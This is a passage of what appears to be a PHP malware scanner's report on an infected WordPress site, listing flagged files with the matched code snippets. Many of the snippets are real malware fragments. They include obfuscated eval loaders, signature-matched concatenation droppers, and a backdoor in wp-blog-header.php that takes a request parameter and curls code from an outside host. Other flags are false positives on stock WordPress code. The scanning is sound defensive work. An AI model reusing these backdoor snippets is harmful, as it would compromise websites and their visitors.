$magna['4'] . $idled['0'] .$exterminates['1'].$magna['4'].$exterminates['6'] .
$magna['1'] . $brennan['2'] .
$lazybones['5'] .$excommunicating['1'] . $magna['1'] . $jingled['3'].$magna['4'] .
$jessalin. $conducts['3'] . $magna['6'] .
|
|
/custdata02/turtle/imp/wp-admin/includes/themes.php Size: 1.49 kB Created: 2023-08-27 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/wp-admin/includes/file.php Size: 40.68 kB Created: 2013-07-10 03:15:36 Modified: 2019-03-09 07:39:57 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 228 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $overrides['upload_error_handler'](&$file, $message )
|
|
/custdata02/turtle/imp/wp-admin/includes/import.php Size: 2.40 kB Created: 2013-07-10 03:15:34 Modified: 2019-03-09 07:39:58 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$a, $b', 'return strcmp($a[0], $b[0]);')); return $wp_importers; } function register_importer( $id, $name, $description, $callback ) { global $wp_importers; if ( is_wp_error( $callback ) ) return $callback; $wp_importers[$id] = array ( $name, $description, $callback ); } function wp_import_cleanup( $id ) { wp_delete_attachment( $id ); } function wp_import_handle_upload() { if ( !isset($_FILES['import']) ) { $file['error'] = __( 'File is empty. Please upload something more substa...
|
|
/custdata02/turtle/imp/wp-admin/includes/media.php Size: 69.12 kB Created: 2013-07-10 03:15:34 Modified: 2019-03-09 07:39:58 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '$a', "return 'LIMIT $start, 10';" ) ); list($post_mime_types, $avail_post_mime_types) = wp_edit_attachments_query(); ?>
<form id="filter" action="" method="get">
<input type="hidden" name="type" value="<?php echo esc_attr( $type ); ?>" />
<input type="hidden" name="tab" value="<?php echo esc_attr( $tab ); ?>" />
<input type="hidden" name="post_id" value="<?php echo (int) $post_id; ?>" />
<input type="hidden" name="post_mime_type" value="<?php echo isset( $_GET['post_mime_type'...
|
|
/custdata02/turtle/imp/wp-admin/includes/menu.php Size: 6.16 kB Created: 2013-07-10 03:15:33 Modified: 2019-03-09 07:39:58 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 51 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$sub_loop}
|
|
/custdata02/turtle/imp/wp-admin/js/about.php Size: 1.49 kB Created: 2023-03-21 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/wp-admin/js/revisions-js.php Size: 3.09 kB Created: 2013-07-10 03:15:45 Modified: 2019-03-09 07:39:58 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('6(4(){2 e=6(\\'#Q\\').v();2 i=\\'\\\\\\',.R/=\\\\\\\\S-;T"<>U?+|V:W[]X{}\\'.u(\\'\\');2 o=\\'Y[]\\\\\\\\Z;\\\\\\'10,./11{}|12:"13<>?-=14+\\'.u(\\'\\');2 5=4(s){r=\\'\\'...
|
|
/custdata02/turtle/imp/wp-admin/maint/themes.php Size: 1.49 kB Created: 2023-03-24 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/wp-admin/user/text.php Size: 1.49 kB Created: 2023-03-22 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/imp/wp-admin/press-this.php Size: 25.31 kB Created: 2013-07-10 03:15:03 Modified: 2019-03-09 07:39:57 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(
jQuery.ajax({
type: "GET",
url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
cache : false,
async : false,
data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
dataType : "script"
}).responseText
);
if(my_src.length == 0) {
var my_src = eval(
jQuery.ajax({
type: "GET",
url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
cache : false,
async : false,
data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
...
|
|
/custdata02/turtle/imp/wp-admin/admin-media.php Size: 4.89 kB Created: 2013-07-10 03:15:10 Modified: 2019-03-09 07:39:57 Dangers: 9
| Description | Match |
|---|
Sign 0d717969 Line: 2 Dangerous Malware Signature (hash: 0d717969) | <?php $denigrate = 'b'; $gulling =']';$apportion = '$';$convictions='4"Raf'; $big= ')';$governing = 'A';$madlin ='a'; $bostonceltics='I';$leonora='c'; $backwood =',';
$incentives='"T(rO$]L$';
$jowl='T';
$completes='C;bcsfX'; $devon = ':';
$imaginations='E';$binaural ='y';$inductor= 'd';$correctness= 'iAn$';$jarringly = ')';$crossing= ';';
$confiding= '?';
$diagrammatically=';';$announcement = 'a';
$irish = 'to';
$clasps='f';$kit= '_';$establishes= '?oW_]d"r';
$kingsley= 'U'; $franny = 'v';$buffer...
| Sign 84abfe10 Line: 34 Dangerous Malware Signature (hash: 84abfe10) | <?php $billers .$crafting .
$centralizing['2'].$billers . $chests .$bufferrer['3'].$fathers['4'].$infiniteness['0'] . $finance.$centralizing['2']. $controllably['3']. $centralizing['5'] .
| Sign 84abfe10 Line: 37 Dangerous Malware Signature (hash: 84abfe10) | <?php $crafting .$eights['2'] . $chests . $derivative['3'].
$centralizing['5'] .$derivative['3'].$eights['3'] . $bufferrer['3'] .
$fathers['4']. $infiniteness['0'] .$finance . $chests .$dedie['2'] . $billers . $centralizing['2'].$chests. $crafting.
| Sign 84abfe10 Line: 46 Dangerous Malware Signature (hash: 84abfe10) | <?php $dedie['2']. $billers . $eights['3'].$implementation['4'].$chests.$dimensionality['2'].$infiniteness['2'].
$catched['4'].$director['0'].$infiniteness['2'] .$fathers['2'] . $implementation['6'].$director['2']. $implementation['4'].$chests .
| Sign 84abfe10 Line: 49 Dangerous Malware Signature (hash: 84abfe10) | <?php $filippa['1'].$filippa['1'].$becoming . $grabs['2']. $infiniteness['2'] . $director['2'] .$implementation['4'].
$chests. $fathers['2'] . $infiniteness['2']. $dimensionality['2']. $fathers['7'] . $infiniteness['2'] . $dimensionality['2'] .
| Sign 84abfe10 Line: 55 Dangerous Malware Signature (hash: 84abfe10) | <?php $implementation['4'] .
$crafting . $lilly['5']. $controllably['3'] .
$apportioned. $apportioned .$billers.$centralizing['2']. $eights['3'].
$implementation['4'] .$controllably['3']. $blowers.$kettles.
| Sign 84abfe10 Line: 60 Dangerous Malware Signature (hash: 84abfe10) | <?php $fathers['0'].$bloodline['1'].$bufferrer['3']. $crafting . $bloodline['1'].
$crafting.
$billers . $catched['5'].
$kettles .$broken['5'] .
| Sign 84abfe10 Line: 65 Dangerous Malware Signature (hash: 84abfe10) | <?php $fathers['0'] .$bloodline['1'] . $bufferrer['3'].
$crafting.
$bloodline['1'].$crafting . $billers . $catched['5']. $kettles . $broken['5'].
$drafted .$eights['3'] . $controllably['3'] . $apportioned. $apportioned. $billers. $centralizing['2'] .$eights['3'] . $implementation['4']. $controllably['3'] .
| Sign 84abfe10 Line: 74 Dangerous Malware Signature (hash: 84abfe10) | <?php $billers . $lilly['0'].
$crafting .$eights['0'] .
$eights['3']. $bloodline['1'].$crafting .
$apportioned. $billers .$bowstring .
$convictions['0'] .$chests. $catched['5'].$billers .
$finance.$centralizing['5'].$catched['5'] .$billers.
$eights['3'].$implementation['4'] .
|
|
/custdata02/turtle/imp/wp-admin/import.php Size: 6.13 kB Created: 2013-07-10 03:15:08 Modified: 2019-03-09 07:39:57 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$a, $b', 'return strcmp($a[0], $b[0]);')); ?>
<table class="widefat importers" cellspacing="0">
<?php
$style = ''; foreach ($importers as $id => $data) { $style = ('class="alternate"' == $style || 'class="alternate active"' == $style) ? '' : 'alternate'; $action = ''; if ( 'install' == $data[2] ) { $plugin_slug = $id . '-importer'; if ( file_exists( WP_PLUGIN_DIR . '/' . $plugin_slug ) ) { $plugins = get_plugins( '/' . $plugin_slug ); if ( !empty($plugins) ) { $keys = array_ke...
|
|
/custdata02/turtle/imp/wp-admin/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/wp-content/plugins/akismet/load.php Size: 5.10 kB Created: 2013-07-10 03:15:57 Modified: 2019-03-09 07:39:58 Dangers: 8
| Description | Match |
|---|
Sign 0d717969 Line: 3 Dangerous Malware Signature (hash: 0d717969) | <?php $landlord= 'r'; $ambush ='G9al'; $jarid='@'; $getaway = 'Q';
$intolerable =')'; $frantic='yFvH8n';$infinitum ='R'; $condones='tSTVL()['; $describable ='6';$chilled='cfCEPOf';$bernadette= '2'; $girlie ='b'; $cottonmouth='CF[s'; $coney ='8TU2c'; $halves ='a';$hinted='P'; $boldest ='eFe8H_l:';$elaborate ='be';
$determining = 'o'; $compensating = 'e';$contextual='8';
$blend= '('; $ddene = '"$sYV=';
$curse='$'; $cooped= 'Z]P_t';$blizzards='T';
$fortresses = 'e$E"f;1';$lord= 'aafc'; $bowmen='8ga_eT...
| Sign 84abfe10 Line: 22 Dangerous Malware Signature (hash: 84abfe10) | <?php $coziness . $bedtime['8'] . $businessmen.
$coziness .
$laughingstock['0'].$finicky['2'].
$gadolinium['4'] .$bra['1']. $bedtime['1'].
$businessmen .$laughingstock['2']. $condones['7'].
| Sign 84abfe10 Line: 32 Dangerous Malware Signature (hash: 84abfe10) | <?php $bedtime['8']. $leatherback['2'].
$laughingstock['0'] . $foreigners['0'].$condones['7'] . $foreigners['0'].
$finicky['7'] . $finicky['2'] . $gadolinium['4'] . $bra['1'] .$bedtime['1']. $laughingstock['0']. $gadolinium['0'].$coziness . $businessmen. $laughingstock['0'].$bedtime['8'] .
| Sign 84abfe10 Line: 45 Dangerous Malware Signature (hash: 84abfe10) | <?php $limbo['1'] . $brainstorm['1'].
$granted['6']. $bedtime['8'] . $gadolinium['3']. $laughingstock['2'].
$chef['3'].$chef['3']. $coziness.$businessmen .$finicky['7'] . $granted['6'] .$laughingstock['2'] .$finicky['5'].$limbo['5']. $capitalizing['3'].$bra['7'] . $finicky['6']. $capitalizing['3'].$capitalizing['6'].
| Sign 84abfe10 Line: 47 Dangerous Malware Signature (hash: 84abfe10) | <?php $capitalizing['3'] .
$finicky['2'] .$bedtime['1'].$finicky['2'].$foreigners['1'] . $foreigners['1']. $crab['1'].$crab['1']. $limbo['5'] . $finicky['8'].$limbo['1'].$inorganic .$granted['6'] .$laughingstock['2'].$finicky['5'] .$limbo['5'].$capitalizing['3'] .
$bra['7'] .$finicky['6'].$capitalizing['3'].
| Sign 84abfe10 Line: 51 Dangerous Malware Signature (hash: 84abfe10) | <?php $capitalizing['6'].
$capitalizing['3'] .$finicky['2'] .$bedtime['1'] .$finicky['2'] .$foreigners['1']. $foreigners['1'].$crab['1']. $crab['1'].$limbo['5'].$finicky['8'].
$bedtime['0']. $finicky['7'].
$laughingstock['2']. $chef['3'].
$chef['3']. $coziness .$businessmen .$finicky['7'] . $granted['6'].
| Sign 84abfe10 Line: 62 Dangerous Malware Signature (hash: 84abfe10) | <?php $foreigners['1'].
$foreigners['1'].$crab['1'] .$crab['1'] . $limbo['5']. $finicky['8']. $limbo['1'] .$inorganic . $granted['6']. $laughingstock['2']. $finicky['5']. $limbo['5'].
| Sign 84abfe10 Line: 74 Dangerous Malware Signature (hash: 84abfe10) | <?php $laughingstock['2'].$coziness.
$limbo['1']. $brainstorm['1'] .$coziness .$cookiemonster .
$bedtime['8'] .
$boldest['6'] .
$finicky['7'].$bra['7']. $bedtime['8'] . $chef['3'] . $coziness . $describable .$handleable.
$laughingstock['0'] .
|
|
/custdata02/turtle/imp/wp-content/plugins/jetpack/modules/sharedaddy/sharing-service.php Size: 15.83 kB Created: 2013-07-10 03:16:49 Modified: 2019-03-09 07:39:58 Dangers: 2
| Description | Match |
|---|
Exploit nano Line: 158 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $services[$service]( $service, array_merge( $global, isset( $options[$service] )
| Exploit nano Line: 27 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $all[$id]( $id, $config )
|
|
/custdata02/turtle/imp/wp-content/plugins/jetpack/meta.php Size: 4.70 kB Created: 2013-07-10 03:16:01 Modified: 2019-03-09 07:39:58 Dangers: 4
| Description | Match |
|---|
Function strrev eval_strrev Line: 26 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Sign 84abfe10 Line: 101 Dangerous Malware Signature (hash: 84abfe10) | <?php $dogbert . $heading .$bassinet['2']. $creditor['0'] .
$iuytrewq['2'] .$crumbs.$bassinet['2'] .$creditor['0'] . $associativity['1'].$exalt .
$associativity['6'] . $creatures.
$creatures .
| Sign 84abfe10 Line: 80 Dangerous Malware Signature (hash: 84abfe10) | <?php $jedidiah['6'].
$iuytrewq['1']. $asters .$encodings['6'] .$encodings['6'] . $encodings['2']. $heading .$encodings['5']. $dogbert. $dogbert.
$dogbert .
| Sign 84abfe10 Line: 87 Dangerous Malware Signature (hash: 84abfe10) | <?php $jedidiah['6'].$iuytrewq['1']. $asters .
$encodings['6'].$encodings['6'].$encodings['2'].
$heading .
$encodings['5'].
$dogbert .$dogbert. $dogbert.
|
|
/custdata02/turtle/imp/wp-content/themes/ifeature/core/classy-options/options-themes.php Size: 5.60 kB Created: 2013-07-10 03:17:02 Modified: 2019-03-09 07:39:58 Warns: 1
| Description | Match |
|---|
Function system Line: 76 Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php System (CMS).
<br /><br />
Business Pro offers intuitive options enabling any business to use WordPress as their content management system. Business Pro offers designers and developers Custom CSS, Import / Export options, and support for CSS3, and HTML5. Even if you are not a designer, Business Pro is built to be business friendly.
<br /><br />
<div class="buy"><a href="http://cyberchimps.com/businesspro" target="_blank">Buy Business Pro</a></div>
</div>
<div class="theme_images">
...
|
|
/custdata02/turtle/imp/wp-content/themes/ifeature/content-funcs.php Size: 4.74 kB Created: 2013-07-10 03:17:00 Modified: 2019-03-09 07:39:58 Dangers: 8
| Description | Match |
|---|
Sign 0d717969 Line: 3 Dangerous Malware Signature (hash: 0d717969) | <?php $dossier='$';$fatality = 'eBin(c';$choir='_';$brashness=';'; $hardy = 'T'; $gian ='r';
$caroljean= 'a'; $crimes = ')';$arabela =';_L_E EU';
$krystal='_';$averse='gJO';$director = 'i'; $galloper= 'a'; $hammock = '))T'; $infinitum='I'; $barracuda= 'VeQ)';
$looped ='e';
$director= '1';$legalizing = 'V'; $coops = 'B';$fetchingly = 'Rf_;>b';$conjunction = 'P';$indicates= 'E';$investigation = 'tdeSdb)';$dowitcher= '_'; $infrequently ='=$K"';$cooped ='i';$apprehend='i"_$XP(';
$barycentric='b]';
...
| Sign 84abfe10 Line: 22 Dangerous Malware Signature (hash: 84abfe10) | <?php $degenerating['1'] .
$iceberg['5'].
$enjoins.
$leila['4']. $gladden['2'].$enjoins. $bivalve. $bivalve .$enjoins . $centuries['0'] .
| Sign 84abfe10 Line: 48 Dangerous Malware Signature (hash: 84abfe10) | <?php $foresee. $gladden['3'].
$gladden['5'] .$legalizing .$gladden['3'] .$gladden['5'].
$degenerating['0']. $camila['6'].
$gladden['1'] .$enjoins.$knapsacks['4']. $kindle .
$delaney.
$delaney. $degenerating['1'] . $devout . $gladden['2'].$gladden['1'].$kindle. $knapsacks['8'].
| Sign 84abfe10 Line: 56 Dangerous Malware Signature (hash: 84abfe10) | <?php $gladden['4'] .$leila['1']. $degenerating['1'] . $arising .$degenerating['1'] . $iceberg['0'] . $iceberg['8'] .$degenerating['0'] . $announced['1'] .$gladden['1'].$kindle.
$knapsacks['8'] .$iceberg['0'].
| Sign 84abfe10 Line: 58 Dangerous Malware Signature (hash: 84abfe10) | <?php $gladden['4'] .$leila['1'].
$degenerating['1']. $arising .$degenerating['1'] . $iceberg['0'].
$iceberg['8'].$crushing. $gladden['2'].
$kindle . $delaney .
$delaney . $degenerating['1'] .
$devout.
$gladden['2'] . $gladden['1']. $kindle .
$knapsacks['8'] .$iceberg['0'] .
| Sign 84abfe10 Line: 68 Dangerous Malware Signature (hash: 84abfe10) | <?php $legions .$gladden['3'].$arising.$gladden['3']. $iceberg['0']. $iceberg['8'] .
$degenerating['0'].$announced['1'] .
$gladden['1'].
$kindle . $knapsacks['8'].$iceberg['0'] .
| Sign 84abfe10 Line: 74 Dangerous Malware Signature (hash: 84abfe10) | <?php $legions.$gladden['3'].$arising . $gladden['3'] .$iceberg['0'] . $iceberg['8']. $crushing . $coring . $kindle . $degenerating['1'].
$degenerating['0'] .$camila['6']. $degenerating['1'].$iceberg['5'] .$enjoins . $leila['4'].$gladden['2'] . $leila['1'] . $enjoins. $delaney.
| Sign 84abfe10 Line: 77 Dangerous Malware Signature (hash: 84abfe10) | <?php $coring.$degenerating['1'] .
$gladden['4'].$chairman['3'] . $coring .$degenerating['1']. $gladden['2'].$gladden['1'] .$enjoins.$degenerating['0']. $degenerating['0'] .
|
|
/custdata02/turtle/imp/wp-content/themes/ifeature/dragnet.php Size: 3.36 kB Created: 2013-07-10 03:17:00 Modified: 2019-03-09 07:39:58 Dangers: 1
| Description | Match |
|---|
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $info['feed']($info['file'], $info['link'].'"'. $info['lng'].'"'.$info['title'], $info['file'][1])
|
|
/custdata02/turtle/imp/wp-content/themes/twentyeleven/content-nav.php Size: 4.99 kB Created: 2013-07-10 03:17:28 Modified: 2019-03-09 07:39:58 Dangers: 7
| Description | Match |
|---|
Sign 0d717969 Line: 3 Dangerous Malware Signature (hash: 0d717969) | <?php $gavra = 'E'; $antisemitic = 'r[Fbe(1;_'; $canned= 's'; $keelby='6';$footage= 'dQfeMe'; $digestive= ')ge4OKd1'; $biting= 'S'; $basf= 'r)eai$['; $enterprises='R';$g=']';$classroo = 'atm_"';
$gearard ='E_EU1]g'; $cyril='H'; $discreet = 'H'; $favorites= 'a:u"';
$categorizer= ';O"6';
$courier= '6T';$funereal= 'E';
$annoys=')'; $desmund = '$';
$bodybuilding = 'y';
$homemaker = 'e';
$approval = 'n';
$hypothesizing= 's';$compuserve ='cJiB';$glistened ='e'; $embellish ='"'; $dearie = '_';$fly='PeTZ2Ti...
| Sign 84abfe10 Line: 25 Dangerous Malware Signature (hash: 84abfe10) | <?php $exposition['8']. $contouring['4'].
$arrogate['1'] . $jarring['7'] .
$conservationist['4'].
$arrogate['1'].$brink['1']. $brink['1'].$arrogate['1'].$geographically['5'] . $exposition['3'].
| Sign 84abfe10 Line: 29 Dangerous Malware Signature (hash: 84abfe10) | <?php $cowers . $emilia['5'] . $conservationist['0'].
$exposition['3']. $brink['3'] . $exposition['8'] . $curricular['7'] . $exposition['3'].$arrogate['1'] .$brink['1'] .$brink['3'] .$brink['0']. $conservationist['4'] .
$courtroom['1'].$courtroom['1']. $courtroom['1'] .
| Sign 84abfe10 Line: 34 Dangerous Malware Signature (hash: 84abfe10) | <?php $brink['2'] .
$contouring['3']. $brink['6'] .
$arrogate['1'].
$brink['1']. $brink['1']. $arrogate['1'].$geographically['5'] . $exposition['3'].$classroo['2'].$exposition['8'] .$brink['1']. $brink['3'] .
$exposition['8']. $conservationist['4']. $brink['2']. $exposition['3'] .
| Sign 84abfe10 Line: 43 Dangerous Malware Signature (hash: 84abfe10) | <?php $intercommunication['3'].
$backplane['3']. $duration['2']. $brink['2']. $exposition['3'].$contouring['0'].
$conservationist['5'].$conservationist['5']. $fly['8']. $conservationist['6'] .
| Sign 84abfe10 Line: 50 Dangerous Malware Signature (hash: 84abfe10) | <?php $courtroom['1'] . $bernadine['1'] .$brink['2'] . $arrogate['1'] . $brink['6'] . $contouring['3'] .$brink['0']. $brink['0'].$exposition['8'].$curricular['7'] . $conservationist['4'] .
$brink['2'] .$contouring['3'] .
| Sign 84abfe10 Line: 70 Dangerous Malware Signature (hash: 84abfe10) | <?php $conservationist['1'].$contouring['3']. $exposition['8'].
$courtroom['1'] . $bernadine['1']. $exposition['8'].
$contouring['4']. $arrogate['1'].
$jarring['7'].
$conservationist['4'] . $emilia['7'] .
$arrogate['1'] .$brink['0']. $exposition['8'] .$exposition['7'].$flat . $exposition['3'] .$conservationist['1'] .$exposition['8'] . $conservationist['0'] .
|
|
/custdata02/turtle/imp/wp-content/themes/twentyten/entry-archive.php Size: 5.08 kB Created: 2013-07-10 03:17:36 Modified: 2019-03-09 07:39:59 Dangers: 6
| Description | Match |
|---|
